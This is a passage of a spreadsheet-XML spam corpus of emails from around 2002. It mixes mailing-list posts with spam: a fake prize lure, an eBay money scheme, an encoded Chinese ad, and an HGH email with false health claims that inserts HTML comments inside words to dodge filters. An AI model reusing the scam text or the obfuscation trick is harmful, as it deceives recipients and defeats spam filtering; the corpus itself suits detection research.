                   below will not work.&lt;/I&gt;&amp;nbsp;&lt;/FONT&gt; Instead of using the 
                   form,&lt;FONT color=#000080&gt;&amp;nbsp;&lt;/FONT&gt;&lt;A 
                   href="mailto:dturner2002@excite.com?subject=More info, I HAVE INCLUDED MY NAME, PHONE and STATE!(17na0904349)"&gt;&lt;FONT 
                   color=#000080&gt; &lt;/FONT&gt;&lt;I&gt;&lt;FONT color=#0000ff&gt;CLICK 
                   HERE&lt;/FONT&gt;&lt;/I&gt;&lt;/A&gt;&lt;FONT color=#ff0000&gt; &lt;/FONT&gt;&lt;FONT 
                   color=#0000ff&gt;.&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
                   &lt;FORM 
                   action="mailto:dturner2002@excite.com?subject=WS Sales Inquiry17na0904349" 
                   method=post encType=text/plain &lt;FORM&gt;
                   &lt;P align=center&gt;&lt;FONT face=Arial color=#000080 
                   size=1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/FONT&gt;&lt;FONT face=Arial 
                   color=#000000 size=1&gt;Name:&lt;INPUT size=26 name=Name&gt; Phone 
                   w/AC*:&lt;INPUT size=16 name=Phone&gt;State:&lt;INPUT size=6 
                   name=State&gt; &lt;BR&gt;Type Project:&lt;I&gt;&lt;INPUT type=radio value=New 
                   name=Project&gt;&lt;/I&gt; &lt;I&gt;New Site:&lt;INPUT type=radio value=Redesign 
                   name=Project&gt;Redesign &lt;INPUT type=radio value=Flash 
                   name=Project&gt;Flash Intro/banner&lt;/I&gt;&amp;nbsp;&amp;nbsp; Current 
                   site?:&lt;INPUT name=Currentsite&gt;&lt;BR&gt;Comments:&lt;/FONT&gt;&lt;FONT 
                   face=Arial color=#000080 size=1&gt;&lt;INPUT size=66 
                   name=Comments&gt;&amp;nbsp;&amp;nbsp;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT size=2&gt;&lt;INPUT type=submit value=Submit name=B1&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/FORM&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
             &lt;CENTER&gt;
             &lt;DIV align=left&gt;&lt;FONT face=Arial size=2&gt;&lt;BR&gt;If you do not wish to 
             receive our messages,&lt;/FONT&gt;&lt;FONT face=Arial&gt; &lt;FONT size=3&gt;&lt;B&gt;&lt;I&gt;&lt;A 
             href="mailto:plmn77@excite.com?subject=No_more_mail_17na_0904349e3"&gt;CLICK 
             HERE&lt;/A&gt; &amp;nbsp; &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT face=Arial size=2&gt;(Please enter 
             ALL email addresses (in the body of the message) you wish to have 
             eliminated from future 
         mailings.&lt;/FONT&gt;&lt;/DIV&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 [3423HzRl2-702DvNh8963ZrLd3-312VpIa7473UmEw3-824QiA@47]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hello rsharp2 ! You're a Winner
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;div align="left"&gt;&lt;font size="6" face="Times New Roman, Times, serif"&gt;&lt;b&gt;&lt;font color="#FF0000"&gt;You're 
   Bahama Bound!&lt;/font&gt;&lt;font color="#FF6600"&gt; &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
   &lt;br&gt;
   &lt;font face="Times New Roman, Times, serif" size="4"&gt;Dear rsharp2, &lt;/font&gt;&lt;/div&gt;
 &lt;p&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt;Congratulations you&amp;#146;re 
   a winner! &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt;You&amp;#146;ve won a chance 
   to receive an all expense paid Florida Vacation. &lt;br&gt;
   The grand prize will included 5 days and 4 night in Magical Orlando, Florida&lt;br&gt;
   at a world class resort.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt;But wait there's more! 
   You'll also receive a 3 day 2 night round trip cruise to the Bahamas&lt;br&gt;
   with all of your meals and entertainment included aboard the ship&lt;/font&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt;. 
   &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt;You'll also receive a 3 
   day 2 night weekend getaway for 2 in any one of 32&lt;br&gt;
   &lt;/font&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt;destinations around 
   the world. You&amp;#146;ll really enjoy your weekend getaway because&lt;br&gt;
   you can take it any time in the next 18 months. &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt;To enter to win your prize 
   just come to our website and register. &lt;br&gt;
   &lt;a href="http://www143.wiildaccess.com/form.htm"&gt;Click here&lt;br&gt;
   &lt;/a&gt; &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt;Thanks for entering our 
   contest and we look forward to seeing you soon. &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt;Sincerely, &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt;Emily Rodriguez&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt;P.S. You&amp;#146;ve got to 
   hurry. If you claim your weekend getaway in 24 hours&lt;br&gt;
   you will also be entered to receive 2 round trip airline tickets.&lt;br&gt;
   &lt;/font&gt;&lt;font face="Times New Roman, Times, serif" size="4"&gt; So don&amp;#146;t wait, 
   &lt;a href="http://www143.wiildaccess.com/form.htm"&gt;Click here&lt;/a&gt; today. &lt;/font&gt;&lt;font face="Times New Roman, Times, serif"&gt;&lt;br&gt;
   &lt;br&gt;
   &lt;br&gt;
   &lt;br&gt;
   &lt;br&gt;
   To be excluded from future prizes &lt;a href="http://www143.wiildaccess.com/remove.htm"&gt;Click 
   here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: xmms and .mp3 files.
</t>
  </si>
  <si>
    <t xml:space="preserve">humberto@hpcf.upr.edu wrote:
 &gt;Redhat 8 disables all support for .mp3 files, relinking xmms with a zzmp3 
 &gt;module. Does anyone have a fixed spec file for xmms? One that can play mp3's 
 &gt;would be best.
 &gt;
 &gt;  
 &gt;
 oh xmms didn't work for me also
 i used mpg123 i tought its something from me
 like mplayer not working also and gives black screen
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: eBay ordering8932
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" color=3D"#ff0000" size=3D"5"&gt;&amp;=
 quot;Finally - You 
 Too Can Make eBay Into&lt;br&gt;
 A Non-stop Cash Generating Machine working online&amp;quot;&lt;/font&gt;&lt;/b&gt; &lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;&lt;font color=3D"#000000" size=3D=
 "2"&gt;&amp;quot;Why no 
 other eBay Power Seller wants this powerful information in YOUR hands...&amp;q=
 uot;&lt;/font&gt;&lt;font color=3D"#000066" size=3D"3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;span style=3D"BACKGROUND-COLOR: #ffff00"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"4"&gt;Get make money with=
  eBay 
 secrets exposed for a SUPER LOW price&lt;/font&gt;&lt;/span&gt; &lt;/b&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;b&gt;
 &lt;p style=3D"MARGIN-TOP: 1px; MARGIN-BOTTOM: 8px; LINE-HEIGHT: 100%" align=3D=
 "center"&gt;
 &lt;font size=3D"4" color=3D"#FF0000"&gt;&lt;span style=3D"background-color: #FFFF0=
 0"&gt;HOW WOULD YOU LIKE TO:&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;font color=3D"#FF0000"&gt;&lt;span s=
 tyle=3D"background-color: #FFFF00"&gt;
 &lt;/span&gt;&lt;/font&gt; &lt;/p&gt;
 &lt;p style=3D"MARGIN-TOP: 1px; MARGIN-BOTTOM: 8px; LINE-HEIGHT: 100%" align=3D=
 "center"&gt;
 &lt;font size=3D"4" color=3D"#FF0000"&gt;&lt;b&gt;&lt;span style=3D"background-color: #FF=
 FF00"&gt;Make $500 A DAY&amp;nbsp;from eBay&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;strong&gt;&lt;font face=3D"Arial,Helvetica" color=3D"#ff000=
 0" size=3D"4"&gt;&amp;nbsp;$500 
 a DAY is very easy when you are given the&amp;nbsp;secrets to show you exactly=
  how&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align=3D"center"&gt;
   &lt;p align=3D"center"&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" color=3D"#ff0000" size=3D"4"=
 &gt;&lt;i&gt;You'll 
   Discover The Closely Guarded &lt;u&gt;Secret Sources&lt;/u&gt; The&lt;br&gt;
   Auction Masters Use To Turn Pennies Into Dollars...&lt;/i&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Sources th=
 at sell 
   below wholesale, directly to you.&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Arial, Helveti=
 ca, sans-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;Incredible=
  drop 
   shipping sources that ship the product FOR YOU. Maintain no inventory, j=
 ust 
   take the orders and the money!&lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Arial, Helvetica,=
  sans-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Save time - f=
 ind what 
   you want, quick and easy.&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-ser=
 if"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Find products=
  95% of 
   eBayers can't find.&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt; &lt;=
 /font&gt;
   &lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Access to the=
  same 
   secret sources eBay power sellers use to make huge profits.&lt;/font&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;One very secr=
 et source 
   that's so secret you won't find it anywhere else. I guarantee you don't =
 find 
   this source ANYWHERE ELSE.&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-se=
 rif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Direct links =
 to over 
   100 secret sources website's for &lt;b&gt;&lt;i&gt;&lt;font color=3D"#ff0000"&gt;&lt;u&gt;INSTAN=
 T ACCESS&lt;/u&gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt; 
   to &lt;b&gt;over 500,000 products!&lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, s=
 ans-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Get just abou=
 t &lt;b&gt;any 
   product&lt;/b&gt; in small quantities, Wholesale!&lt;/font&gt;&lt;font face=3D"Arial, H=
 elvetica, sans-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Instantly =
 start your 
   own profitable online business, in your spare time!&lt;/font&gt;&lt;/b&gt;&lt;font face=
 =3D"Arial, Helvetica, sans-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Unique produc=
 ts that 
   can be marked up an astonishing 10,000%&lt;/font&gt;&lt;font face=3D"Arial, Helve=
 tica, sans-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Instant Order=
 s, All 
   Sources accept Credit Cards or Paypal !&lt;/font&gt;&lt;font face=3D"Arial, Helve=
 tica, sans-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Turn Your Hob=
 by into a
   &lt;b&gt;healthy full-time income.&lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, s=
 ans-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;Make more =
 in your 
   spare time than at your full-time, boring job.&lt;/b&gt; &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Rewarding bus=
 iness that 
   gives you &lt;b&gt;more free-time.&lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, s=
 ans-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Work from =
 home -- 
   Make money from eBay today.&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Arial, Helvetica, sa=
 ns-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;You choose=
  how much 
   you make, it's all up to you.&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif"&gt;
   &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"5"&gt;
 &lt;a href=3D"http://www.ebook-info.com/ebaybook.htm"&gt;GO HERE FOR MORE INFORM=
 ATION&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=3D"center"&gt;To be taken off any further mailings
 &lt;a href=3D"http://www.ebook-info.com/offnow.cfm"&gt;click here&lt;/a&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] razor plugins for mozilla?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --aT9PWwzfKXlsBJM1
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Revoking self-submitted content (unblocking something you accidentally
 blocked) results in permanent deletion of said content from the
 network.
 Fortunately, Razor2/SpamNet isa network of content people DON'T want
 [in their inbox, let alone IP rights].  Block away!
 --jordan
 On Tue, Sep 03, 2002 at 12:24:33PM -0700, Craig R.Hughes wrote:
 # "Free" is a relative concept if you actually read the EULA.  No
 # commercial use, and anything you submit to razor becomes entirely
 # their intellectual property.  Better not accidentally hit "This is
 # spam" on anything you want to retain IP rights to.
 --aT9PWwzfKXlsBJM1
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9dSc/pwQdAVEbU7oRAlZcAJ0dsOi7U1Mf/2LjCE87mRSBhe1gpQCeJ7yf
 P310bOJSkBt79KRJMo+oTgQ=
 =+IYG
 -----END PGP SIGNATURE-----
 --aT9PWwzfKXlsBJM1--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</si>
  <si>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=?big5?Q?re:=A7=DA=AA=BE=B9D=A7A=BB=DD=ADn=A7=F3=A6h=BE=F7=B7|,=A4@=B0_=A8=D3=A7a!?=
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_eZIySJCgLFoIw4lk9MkBwobm5
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_eZIySJCgLFoIw4lk9MkBwobm5AA"
 ------=_NextPart_eZIySJCgLFoIw4lk9MkBwobm5AA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29u
 dGVudD0iemgtdHciPg0KPG1ldGEgbmFtZT0iR0VORVJBVE9SIiBjb250ZW50PSJNaWNyb3NvZnQg
 RnJvbnRQYWdlIDUuMCI+DQo8bWV0YSBuYW1lPSJQcm9nSWQiIGNvbnRlbnQ9IkZyb250UGFnZS5F
 ZGl0b3IuRG9jdW1lbnQiPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50
 PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8dGl0bGU+s2+sT6llsFWl0bFNt368c6dppL2l
 caVOtW+kxaq9sbWmXqtItUyqa7G1pqwgy+c8L3RpdGxlPg0KPC9oZWFkPg0KDQo8Ym9keT4NCg0K
 PHAgc3R5bGU9Im1hcmdpbi10b3A6IDBweDsgbWFyZ2luLWJvdHRvbTogMHB4Ij48Zm9udCBjb2xv
 cj0iIzgwODA4MCI+DQqzb6xPqWWwVaXRsU23frxzp2mkvaVxpU61b6TFqr2xtaZeq0i1TKprsbWm
 rCDL5yB+ICE8L2ZvbnQ+PC9wPg0KPGhyIFNJWkU9IjEiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj4N
 CiAgPGNlbnRlcj4NCiAgPHRhYmxlIHN0eWxlPSJib3JkZXI6IDFweCBkb3R0ZWQgI0ZGMDAwMDsg
 OyBib3JkZXItY29sbGFwc2U6Y29sbGFwc2UiIGhlaWdodD0iMzY1IiBjZWxsU3BhY2luZz0iMCIg
 Y2VsbFBhZGRpbmc9IjAiIHdpZHRoPSI2MDQiIGJvcmRlcj0iMCIgYm9yZGVyY29sb3JsaWdodD0i
 IzAwODAwMCIgYm9yZGVyY29sb3I9IiMxMTExMTEiPg0KICAgIDx0cj4NCiAgICAgIDx0ZCB2QWxp
 Z249ImNlbnRlciIgYWxpZ249Im1pZGRsZSIgd2lkdGg9IjU5OCIgYmdDb2xvcj0iI0ZGRkYwMCIg
 aGVpZ2h0PSIzNjUiPg0KICAgICAgPHAgYWxpZ249ImNlbnRlciI+oUA8L3A+DQogICAgICA8cCBh
 bGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMEZG
 Ij6mbqpCpM2w2iE8L2ZvbnQ+PC9wPg0KICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFj
 ZT0ivNC3osXpIiBzaXplPSI0IiBjb2xvcj0iIzAwMDBGRiI+DQogICAgICCzXKZopEiv4KRPqFOm
 s6Txp0GmbiymXaywtHi0pKRGrsm+9zwvZm9udD48L3A+DQogICAgICA8cCBhbGlnbj0iY2VudGVy
 Ij48Zm9udCBmYWNlPSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMEZGIj6p0qVIpGq1b6dR
 passs9C3fq1QtEksPC9mb250PjwvcD4NCiAgICAgIDxwIGFsaWduPSJjZW50ZXIiPjxmb250IGZh
 Y2U9IrzQt6LF6SIgc2l6ZT0iNCIgY29sb3I9IiMwMDAwRkYiPrNcpmg8L2ZvbnQ+PGZvbnQgZmFj
 ZT0ivNC3osXpIiBjb2xvcj0iI0ZGMDAwMCIgc2l6ZT0iNiI+vve3fDwvZm9udD48Zm9udCBmYWNl
 PSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMEZGIj6lbqr5rsksqbmpuaV1PC9mb250Pjxm
 b250IGZhY2U9IrzQt6LF6SIgY29sb3I9IiNGRjAwRkYiIHNpemU9IjYiPqazM6ztxMEhPC9mb250
 PjwvcD4NCiAgICAgIDxwIGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9IrzQt6LF6SIgc2l6ZT0i
 NCIgY29sb3I9IiMwMDAwRkYiPrROpl2ssCZxdW90OzwvZm9udD48Zm9udCBmYWNlPSK80Leixeki
 IGNvbG9yPSIjMDAwMEZGIiBzaXplPSI1Ij6ko6XMpN8mcXVvdDs8L2ZvbnQ+PGZvbnQgZmFjZT0i
 vNC3osXpIiBzaXplPSI0IiBjb2xvcj0iIzAwMDBGRiI+s3m0TrNcpmikSKZis2+4zKaopVw8L2Zv
 bnQ+PC9wPg0KICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0ivNC3osXpIiBzaXpl
 PSI0IiBjb2xvcj0iIzAwMDBGRiI+s8yxTbd+qrq5zraku7K+ybF6PC9mb250PjwvcD4NCiAgICAg
 IDxwIGFsaWduPSJjZW50ZXIiPjxhIGhyZWY9Imh0dHA6Ly92aWMuaDhoLmNvbS50dy8iPg0KICAg
 ICAgPGZvbnQgc2l6ZT0iNiIgZmFjZT0ivNC3osXpIiBjb2xvcj0iI0ZGMDAwMCI+MrhVpLi26qRA
 rdOkcKbRwfOqurnaPC9mb250PjwvYT48L3A+DQogICAgICA8cCBhbGlnbj0iY2VudGVyIj4yMKTA
 xMGs3cC0s2+t0773t3wsp0G0TqxPptukdqq6pUSkSCGvrLF6pm65QjwvcD4NCiAgICAgIDxwPjxm
 b250IGNvbG9yPSIjZmYwMGZmIj48YSBocmVmPSJodHRwOi8vdmljLmg4aC5jb20udHcvIj4NCiAg
 ICAgIGh0dHA6Ly92aWMuaDhoLmNvbS50dzwvYT48L2ZvbnQ+PHA+PGZvbnQgY29sb3I9IiNGRjAw
 MDAiPg0KICAgICAgPHNwYW4gbGFuZz0iZW4tdXMiPjxmb250IHNpemU9IjciPnBzOjwvZm9udD48
 L3NwYW4+t1G2aaRAqEKqvrlEpnCm86ZirmG7tMNQpc669Lj0wcikar/6LKVpPC9mb250Pjxmb250
 IHNpemU9IjQiIGNvbG9yPSIjMDAwMEZGIj6nS7ZPs/imV7r0uPSvU7BWPC9mb250PjxwPg0KICAg
 ICAgPGZvbnQgY29sb3I9IiNGRjAwMDAiPqZwqkesebZxuUywqqzdpKOo7L11pFe8dqT5LKVpr8Go
 +qdLtk+z0Ld+pfq60DwvZm9udD48Zm9udCBjb2xvcj0iIzAwMDBGRiI+KL3QpmKtuq22r2SkValt
 ple5cbjcpu2nfSk8L2ZvbnQ+PHA+oUA8cD4NCiAgICAgIKFAPHA+oUA8cD6hQDwvdGQ+DQogICAg
 PC90cj4NCiAgPC90YWJsZT4NCiAgPC9jZW50ZXI+DQo8L2Rpdj4NCjxociBTSVpFPSIxIj4NCjxw
 IHN0eWxlPSJtYXJnaW4tdG9wOiAwcHg7IG1hcmdpbi1ib3R0b206IDBweCIgYWxpZ249ImNlbnRl
 ciI+DQo8Zm9udCBjb2xvcj0iI2ZmMDAwMCI+pnCms6W0wlq90KijvcyhQaSjt1GmQaasqOymuatI
 vdCr9iZuYnNwOyAtJmd0OyZuYnNwOyAoPGEgaHJlZj0iaHR0cDovL3gtbWFpbC5oOGguY29tLnR3
 IiB0YXJnZXQ9Il9ibGFuayI+qdqmrLxzp2k8L2E+KTwvZm9udD48L3A+DQoNCjwvYm9keT4NCg0K
 PC9odG1sPg==
 ------=_NextPart_eZIySJCgLFoIw4lk9MkBwobm5AA--
 ------=_NextPart_eZIySJCgLFoIw4lk9MkBwobm5--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Insanely complicated
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#insanely_complicated
 Date: 2002-10-02T09:34:51-05:00
 _Ian Hickson_: My faceless enemy has been defeated[1]. &amp;#8220;My arch nemesis 
 over the last couple of weeks has been the very poorly documented Hebrew 
 Traditional Numbering System.&amp;#8221;
 [1] http://ln.hixie.ch/?start=1033524738&amp;count=1
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: zzzz,Your HGH Request!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 Hello, zzzz@neilgarner.com&lt;BR&gt;
 &lt;BR&gt;
 As se&lt;!--5--&gt;en on NB&lt;!--D--&gt;C, CBS, and CN&lt;!--H--&gt;N, and even Opr&lt;!--D--&gt;ah!  The health&lt;br&gt;
 discove&lt;!--F--&gt;ry that actually revers&lt;!--D--&gt;es aging while burning fat,&lt;br&gt;
 with&lt;!--boy--&gt;out dieti&lt;!--D--&gt;ng or exerc&lt;!--F--&gt;ise!  This pro&lt;!--A--&gt;ven discovery has even&lt;br&gt;
 been report&lt;!--zzzz--&gt;ed on by the Ne&lt;!--test--&gt;w Engl&lt;!----&gt;and Jour&lt;!--F--&gt;nal of Medi&lt;!--F--&gt;cine.&lt;br&gt;
 For&lt;!--zzzz--&gt;get aging and d&lt;!----&gt;ieting forever!  And it's Gua&lt;!--S--&gt;ranteed!&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 * Red&lt;!--lo--&gt;uce body fat and build lean muscle WIT&lt;!--zzzz--&gt;HOUT EXERCISE!&lt;br&gt;
 * Enha&lt;!--zzzz--&gt;ce se&lt;!--la--&gt;xual perf&lt;!--hehe--&gt;ormance&lt;br&gt;
 * Rem&lt;!--zzzz--&gt;ove wrinkles and cellulite&lt;br&gt;
 * Lower blood pres&lt;!--zzzz--&gt;sure and improve choles&lt;!----&gt;terol profile&lt;br&gt;
 * Imp&lt;!--zzzz--&gt;rove sleep, vision and me&lt;!----&gt;mory&lt;br&gt;
 * Resto&lt;!--zzzz--&gt;re hair color and gro&lt;!----&gt;wth&lt;br&gt;
 * Stren&lt;!--zzzz--&gt;gthen the immune sys&lt;!----&gt;tem&lt;br&gt;
 * Incre&lt;!--zzzz--&gt;ase ener&lt;!----&gt;gy and card&lt;!----&gt;iac output&lt;br&gt;
 * Turn bac&lt;!--zzzz--&gt;k your body's biol&lt;!----&gt;ogical time cl&lt;!----&gt;ock 10-20 years&lt;br&gt;
 in 6 months of usage !!!&lt;br&gt;&lt;br&gt;
 &lt;a href="http://202.101.163.34:81/ultimatehgh_zeng/index.html"&gt;FOR FRE&lt;!--o--&gt;E INFO&lt;!--you--&gt;RMATION AND G&lt;!--love--&gt;ET FREE 
 1 MON&lt;!--zzzz--&gt;TH SUPPLY OF HG&lt;!----&gt;H CLICK HERE&lt;/a&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;
 You are recei&lt;!--zzzz--&gt;ving this email as a subscr&lt;!----&gt;iber&lt;br&gt;
 to the Opt&lt;!--zzzz--&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
